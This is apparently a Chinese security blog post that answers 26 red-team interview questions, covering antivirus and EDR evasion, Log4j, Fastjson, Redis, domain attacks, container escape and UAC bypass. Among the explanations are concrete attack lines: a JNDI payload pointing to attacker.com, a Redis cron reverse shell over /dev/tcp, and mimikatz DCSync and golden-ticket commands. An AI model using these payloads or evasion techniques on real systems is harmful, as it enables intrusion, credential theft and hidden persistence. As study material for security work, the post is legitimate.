网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
25. Spring4Shell(CVE-2022-22965)
攻防对抗研究员
1、免杀 2、php5/7区别 3、log4j 原理如何检测 绕过 不出网 4、fastjson不出网 5、java 内存马 6、apk双向认证如何绕过 7、php反序列化 和java反序列化 .net 8、逻辑漏洞 9、除了web和社工其他方式渗透方法 10、对抗EDR 11、隐藏流量特征 怎么和把ip地址变成可信 12、jwt 认证机制 13、k8s集群 14、云渗透 15、容器逃逸 16、mysql在哪里情况下可以直接执行系统命令 17、域攻击 18、redis获得shell方法 19、小程序的攻击方法 20、域内 有什么方法能拿到黄金票据 21、二进制逆向 22、二进制漏洞 23、爱加密和梆梆壳怎么脱 24、无线渗透怎么去做 25、spring4shell 原理以及如何检测 26、bypass uac
1. 免杀技术
- 核心原理:通过混淆代码、加密载荷、修改特征码等方式绕过杀毒软件检测。
- 常见方法:
- 使用无文件攻击(内存加载PE文件)。
- 动态API调用(如通过哈希值定位函数)。
- 代码分段执行(Staged Payload)。
- 利用合法软件白名单(如PowerShell、MsBuild)。
- 反沙箱技术(检测虚拟机环境)。
2. PHP5与PHP7的区别
- 类型系统:PHP7支持标量类型声明(
int
,string
等)和返回类型声明。- 性能:PHP7引擎(Zend Engine 3.0)性能提升2倍以上。
- 错误处理:PHP7引入
Error
异常类,替代部分致命错误。- 语法特性:PHP7支持组合比较符(
<=>
)、匿名类等。- 废弃特性:移除了
mysql_*
函数、ASP风格标签(<% %>
)等。
3. Log4j漏洞(CVE-2021-44228)
- 原理:通过JNDI注入实现远程代码执行(RCE),利用
${jndi:ldap://attacker.com/exp}
触发。- 检测:
- 流量分析:检测HTTP头、日志中的
jndi:
模式。- 日志监控:查找异常
Lookup
事件。- 绕过:
- 使用
${::-j}ndi
等字符转义。- 利用上下文数据(如User-Agent)注入。
- 不出网利用:
- 通过DNS协议外带数据。
- 利用中间件(如Redis)构造内网穿透。
4. Fastjson不出网利用
- 依赖条件:目标环境需存在可利用的反序列化链(如
TemplatesImpl
)。- 方法:
- 构造恶意JSON触发
@type
指定危险类。- 利用
JdbcRowSetImpl
结合本地LDAP服务(需绕过高版本补丁)。- 结合文件写入(如写入Webshell到
/tmp
目录)。
5. Java内存马
- 注入方式:
- Filter/Servlet型:通过动态注册Filter拦截请求。
- Agent型:利用
Instrumentation
修改字节码。- 检测:
- 内存分析工具(如Arthas)检查加载的类。
- 对比Web容器配置(如
web.xml
)与实际Filter链。- 对抗:部署RASP(运行时应用自保护)监控类加载行为。
6. APK双向认证绕过
- 方法:
- 证书绑定绕过:Hook SSL库(如Xposed模块
JustTrustMe
)。- 中间人攻击:伪造CA证书并劫持通信。
- 反编译修改:删除证书校验逻辑(定位
checkClientTrusted
方法)。
7. 反序列化漏洞对比
语言 触发点 典型漏洞链 PHP unserialize()
Phar反序列化、魔术方法触发 Java readObject()
CommonsCollections、Fastjson .NET BinaryFormatter
ViewState、JSON.NET
8. 逻辑漏洞
- 常见类型:
- 越权漏洞(水平/垂直权限绕过)。
- 业务流篡改(如跳过支付步骤)。
- 竞争条件(并发请求导致库存超卖)。
- 检测:人工审计业务流程,结合Burp Suite重放测试。
9. 非Web/社工的渗透方法
- 网络层:ARP欺骗、DNS劫持。
- 无线攻击:WPA2破解(PMKID捕获)、伪造热点。
- 物理渗透:BadUSB、HID攻击(如Rubber Ducky)。
- 供应链攻击:污染软件更新源或依赖库。
10. 对抗EDR(终端检测与响应)
- 进程隐藏:使用Direct System Call替代API调用。
- 内存加密:对恶意代码段进行动态解密。
- 行为混淆:模拟合法进程行为(如注入到
explorer.exe
)。- 驱动对抗:利用漏洞卸载EDR驱动(需内核权限)。
11. 隐藏流量特征与IP可信化
- 流量伪装:
- 使用HTTPS加密通信。
- 域前置(Domain Fronting)隐藏真实C2。
- IP可信化:
- 利用云服务商IP段(如AWS、Azure)。
- 通过Tor出口节点或CDN(如Cloudflare)代理。
12. JWT认证机制
- 结构:Header(算法)、Payload(数据)、Signature(签名)。
- 漏洞:
- 弱密钥爆破(如
secret
)。- 算法篡改(
alg:none
攻击)。- 注入攻击(修改Payload中的用户ID)。
13. K8s集群攻击面
- 配置错误:未鉴权的API Server(
6443
端口)。- 容器逃逸:利用特权容器挂载宿主机根目录。
- 敏感数据:从ConfigMap/Secret中获取凭据。
14. 云渗透
- 攻击路径:
- IAM凭据泄露(如AccessKey硬编码)。
- 存储桶权限配置错误(AWS S3公开访问)。
- 虚拟机元数据服务(SSRF获取临时Token)。
15. 容器逃逸
- 方法:
- 挂载宿主机目录:
docker run -v /:/host
。- 利用Linux Capability(如
CAP_SYS_ADMIN
)。- CVE-2021-30465(runc漏洞导致逃逸)。
16. MySQL执行系统命令
- 条件:需具备
FILE
权限和secure_file_priv
为空。- 方法:
- UDF提权:编译恶意
.so
文件写入插件目录。- 利用漏洞:CVE-2016-6662(通过日志文件提权)。
17. 域攻击
- 横向移动:Pass-the-Hash、Overpass-the-Hash。
- 权限提升:滥用ACL(如GenericAll权限)。
- 持久化:Golden Ticket、DCShadow攻击。
18. Redis获取Shell
- 写SSH密钥:
config set dir /root/.ssh/
+ 写入公钥。- 计划任务:
set x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n"
。- 主从复制:通过
SLAVEOF
加载恶意模块(Redis 4.x以上)。
19. 小程序攻击方法
- 反编译:使用工具(如wxappUnpacker)获取源码。
- API滥用:未鉴权的云函数调用、硬编码密钥泄露。
- 本地存储:
wx.setStorageSync
敏感数据未加密。
20. 域内获取黄金票据
- 条件:需获取
krbtgt
用户的NTLM哈希。- 步骤:
- 通过DCSync导出哈希:
mimikatz lsadump::dcsync /user:krbtgt
。- 生成票据:
mimikatz kerberos::golden /user:admin /domain:xxx /sid:xxx /krbtgt:xxx
。
21. 二进制逆向
- 工具链:IDA Pro(静态分析)、GDB/LLDB(动态调试)、Ghidra(反编译)。
- 技巧:
- 识别关键函数(如
strcmp
、memcpy
)。- 修改ELF头绕过反调试(
PT_DENY_ATTACH
)。
22. 二进制漏洞
- 类型:
- 栈溢出(如
gets
函数)。- 堆利用(UAF、Double Free)。
- 格式化字符串漏洞(
printf(user_input)
)。
23. 脱壳爱加密/梆梆壳
- 步骤:
- 动态脱壳:使用Frida Hook
dexFile
加载函数。- 内存Dump:通过
Xposed
模块或GDB
提取解密后的DEX。- 修复:使用
dexfixer
工具处理CRC校验。
24. 无线渗透流程
- 嗅探:
airodump-ng
捕获握手包。- 破解:
hashcat
爆破WPA2-PSK(字典/掩码攻击)。- 中间人:
ettercap
实施ARP欺骗+SSLStrip降级攻击。
25. Spring4Shell(CVE-2022-22965)
- 原理:通过数据绑定漏洞修改
Tomcat
日志路径写入Webshell。- 检测:
- 检查
spring-webmvc
版本(5.3.18以下受影响)。- 监控
class.module.*
参数传入。
26. Bypass UAC
- 方法:
- 白名单劫持:替换
%SystemRoot%\System32\fodhelper.exe
的DLL。- COM接口滥用:利用
ICMLuaUtil
接口提权(cmstp.exe /s
)。- 注册表操作:修改
HKCU\Software\Classes\ms-settings\shell\open\command
。